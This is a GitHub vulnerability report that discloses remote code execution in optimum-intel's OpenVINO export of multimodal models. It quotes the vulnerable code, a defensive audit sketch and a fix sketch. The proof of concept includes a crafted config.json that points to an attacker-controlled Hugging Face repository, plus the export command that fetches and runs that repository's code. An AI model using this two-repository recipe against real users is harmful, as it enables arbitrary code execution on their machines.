Remote Code Execution via LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig #1668

@Vancir

Description

There is a remote code execution vulnerability in optimum-intel during OpenVINO export of multimodal models. The issue is in LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig, which unconditionally call AutoConfig.from_pretrained(..., trust_remote_code=True) on the repositories named by config.mm_vision_tower and config.img_processor["model_name"], respectively. Both values come straight from the model's config.json.

At first glance this may look acceptable because the real llava-qwen2/phi3_v architectures normally require custom remote code. However, this assumption is unsafe. Taking LlavaQwen2OpenVINOConfig as an example: an attacker can publish a seemingly normal model repository, set export_model_type to llava-qwen2, and set the mm_vision_tower field in config.json so that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command, optimum-intel initializes LlavaQwen2OpenVINOConfig, fetches the attacker-controlled backend config with trust_remote_code=True, and executes the remote code it references.

This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted config.json, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.
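To illustrate why a check limited to the frontend repo misses this, here is a minimal sketch of a pre-export audit that lists the second-hop repositories a config.json points at. The helper name find_nested_repo_refs and the NESTED_REPO_FIELDS list are hypothetical and not part of optimum-intel; the two field paths are the ones named in this report, and other export configs may reference further fields.

```python
# Config fields named in this report that point at a second repository.
# Each tuple is a key path into (possibly nested) dictionaries.
# Assumption: this list is illustrative, not exhaustive.
NESTED_REPO_FIELDS = [
    ("mm_vision_tower",),
    ("img_processor", "model_name"),
]


def find_nested_repo_refs(config):
    """Return the repository IDs referenced by the fields listed above."""
    refs = []
    for path in NESTED_REPO_FIELDS:
        value = config
        for key in path:
            # Stop walking as soon as the path does not exist in this config.
            if not isinstance(value, dict) or key not in value:
                value = None
                break
            value = value[key]
        if isinstance(value, str) and value:
            refs.append(value)
    return refs


# The crafted frontend config from the proof of concept in this report.
frontend_config = {
    "model_type": "llava",
    "export_model_type": "llava-qwen2",
    "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil",
}

for repo_id in find_nested_repo_refs(frontend_config):
    print("config references a second repository:", repo_id)
```

Any repository reported this way would need the same review as the frontend repo, since its code is what actually runs.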

This issue can be triggered through the standard optimum-cli export openvino workflow. That makes the attack practical for normal users who are simply trying to convert a model, without realizing that the export step itself can execute attacker-controlled code.

Root Cause

The vulnerable code is:

self._behavior = behavior
self._orig_config = config
if self._behavior == VLMConfigBehavior.VISION_EMBEDDINGS:
    config = AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
    if hasattr(config, "vision_config"):
        config = config.vision_config

and

if self._behavior == Phi3VisionConfigBehavior.VISION_EMBEDDINGS and hasattr(config, "img_processor"):
    self._config = AutoConfig.from_pretrained(
        config.img_processor["model_name"], trust_remote_code=True
    ).vision_config
    self._normalized_config = self.NORMALIZED_CONFIG_CLASS(self._config)

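The export path also lets attacker-controlled models reach these classes, because the model type used to select the export config is read from export_model_type in the model's own config whenever that field is present: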

if hasattr(model.config, "export_model_type"):
    model_type = model.config.export_model_type
else:
    model_type = model.config.model_type

submodel_paths = export_from_model(
    model=model,
    output=output,
    task=task,
    ov_config=ov_config,
    stateful=stateful,
    model_kwargs=model_kwargs,
    custom_export_configs=custom_export_configs,
    fn_get_submodels=fn_get_submodels,
    preprocessors=preprocessors,
    device=device,
    trust_remote_code=trust_remote_code,
    patch_16bit_model=patch_16bit,
    **kwargs_shapes,
)
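The effect of that selection logic can be shown in isolation. The sketch below copies the hasattr check from the snippet above into a hypothetical helper, select_model_type, and uses SimpleNamespace objects as stand-ins for model.config; neither name comes from optimum-intel.

```python
from types import SimpleNamespace


def select_model_type(config):
    """Mirror the selection quoted above: export_model_type wins if present."""
    if hasattr(config, "export_model_type"):
        return config.export_model_type
    return config.model_type


# Stand-ins for model.config; a real config object carries many more fields.
crafted = SimpleNamespace(model_type="llava", export_model_type="llava-qwen2")
ordinary = SimpleNamespace(model_type="llava")

print(select_model_type(crafted))   # llava-qwen2
print(select_model_type(ordinary))  # llava
```

Because export_model_type is just another key in config.json, a repository that declares itself as plain llava can still steer the export into LlavaQwen2OpenVINOConfig.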

Proof of Concept

I created two Hugging Face repositories for demonstration.

The frontend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign, contains a crafted config.json:

{
  "model_type": "llava",
  "export_model_type": "llava-qwen2",
  "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}

The backend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, contains attacker-controlled code that will be loaded through AutoConfig.from_pretrained(..., trust_remote_code=True).

Then run the normal export command:

optimum-cli export openvino \
  --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \
  --task image-text-to-text \
  ./tmpdir

During export, optimum-intel reads the frontend model config, sees export_model_type: "llava-qwen2", and initializes LlavaQwen2OpenVINOConfig. Inside that class, it executes:

AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)

Since mm_vision_tower points to the attacker-controlled backend repository, i.e., XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.

$ optimum-cli export openvino --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign --task image-text-to-text ./tmpdir
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
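One possible direction for a fix, sketched here as an assumption rather than as the maintainers' patch, is to forward the caller's own trust_remote_code decision to the nested load instead of hardcoding True. The helper load_nested_config and its loader parameter are hypothetical; loader stands in for AutoConfig.from_pretrained so the sketch runs without network access.

```python
def load_nested_config(repo_id, trust_remote_code=False, loader=None):
    """Load a nested config, forwarding the caller's trust decision.

    `loader` is a stand-in for a function such as
    transformers.AutoConfig.from_pretrained. It is injected here only so the
    sketch can be exercised offline.
    """
    if loader is None:
        # Imported lazily so the sketch runs without transformers installed
        # when a stand-in loader is supplied.
        from transformers import AutoConfig

        loader = AutoConfig.from_pretrained
    # Key difference from the vulnerable code: no hardcoded True.
    return loader(repo_id, trust_remote_code=trust_remote_code)


# Offline demonstration with a recording stand-in loader.
calls = []


def fake_loader(repo_id, **kwargs):
    calls.append((repo_id, kwargs))
    return {"repo": repo_id}


load_nested_config("some-org/vision-tower", loader=fake_loader)
load_nested_config("some-org/vision-tower", trust_remote_code=True, loader=fake_loader)
print(calls)
```

With this shape, a user who did not opt in to remote code for the export would not implicitly opt in for the repository named in mm_vision_tower or img_processor["model_name"] either. A stricter variant could additionally require the nested repository to be explicitly approved.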
